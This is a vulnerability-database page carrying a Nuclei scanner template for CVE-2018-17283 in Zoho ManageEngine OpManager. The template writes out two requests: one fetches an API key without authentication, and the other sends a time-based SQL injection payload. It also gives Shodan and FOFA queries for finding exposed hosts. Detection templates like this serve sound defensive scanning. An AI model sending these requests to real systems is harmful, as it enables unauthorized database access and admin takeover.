Vulners
Lucene search
Zoho ManageEngine OpManager - SQL Injection
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2018-17283 | 23 May 202521:02 | – | circl |
 | ZOHO ManageEngine OpManager Privilege Bypass Vulnerability | 21 Sep 201800:00 | – | cnvd |
 | Zoho ManageEngine OpManager oputilsServlet Authentication Bypass (CVE-2018-17283) | 4 Dec 201800:00 | – | checkpoint_advisories |
| Zoho ManageEngine OpManager SQL Injection (CVE-2018-17823; CVE-2018-17283) | 20 Feb 201900:00 | – | checkpoint_advisories |
 | CVE-2018-17283 | 21 Sep 201803:00 | – | cve |
 | CVE-2018-17283 | 21 Sep 201803:00 | – | cvelist |
 | CVE-2018-17283 | 21 Sep 201803:29 | – | nvd |
 | CVE-2018-17283 | 21 Sep 201803:29 | – | osv |
 | Sql injection | 21 Sep 201803:29 | – | prion |
 | VulnCheck KEV: CVE-2018-17283 | 6 Jan 202400:00 | – | vulncheck_kev |
10
id: CVE-2018-17283
info:
name: Zoho ManageEngine OpManager - SQL Injection
author: DhiyaneshDK
severity: high
description: |
Zoho ManageEngine OpManager before 12.3 Build 123196 does not require authentication for /oputilsServlet requests, as demonstrated by a /oputilsServlet?action=getAPIKey request that can be leveraged against Firewall Analyzer to add an admin user via /api/json/v2/admin/addUser or conduct a SQL Injection attack via the /api/json/device/setManaged name parameter.
impact: |
Unauthenticated attackers can execute SQL injection attacks to access or modify database contents, add administrator users, or extract sensitive information including credentials.
remediation: |
Upgrade to ManageEngine OpManager version 12.3 Build 123196 or later.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-17283
cwe-id: CWE-89
epss-score: 0.60097
epss-percentile: 0.99017
cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
reference:
- https://github.com/x-f1v3/forcve/issues/4
- https://nvd.nist.gov/vuln/detail/CVE-2018-17283
metadata:
verified: true
vendor: zohocorp
product: manageengine_opmanager
shodan-query: http.title:"OpManager"
fofa-query: title="OpManager"
tags: cve,cve2018,oputils,zoho,opmanager,sqli,time-based-sqli,vkev,vuln
http:
- raw:
- |
GET /oputilsServlet?action=getAPIKey HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: api_key
regex:
- 'API_KEY=([0-9a-z]+)'
internal: true
- raw:
- |
POST /api/json/device/setManaged?apiKey={{api_key}}&manage=false HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
name=KcP7OGhC';select%20pg_sleep(6);%20--
matchers:
- type: dsl
dsl:
- "duration>=6"
- "status_code == 200"
- 'contains(body,"result")'
- 'contains(content_type,"application/json")'
condition: and
# digest: 4a0a00473045022100da4a5745ccc8085e7ec064d4bf16724c8d70c8417fbfb0f3f947c792aad7ed7802204a0d37baafab5e352eaab3acbbd818e99a66d0b0e022e73cf81927eda17fec8c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 37.5
EPSS0.60097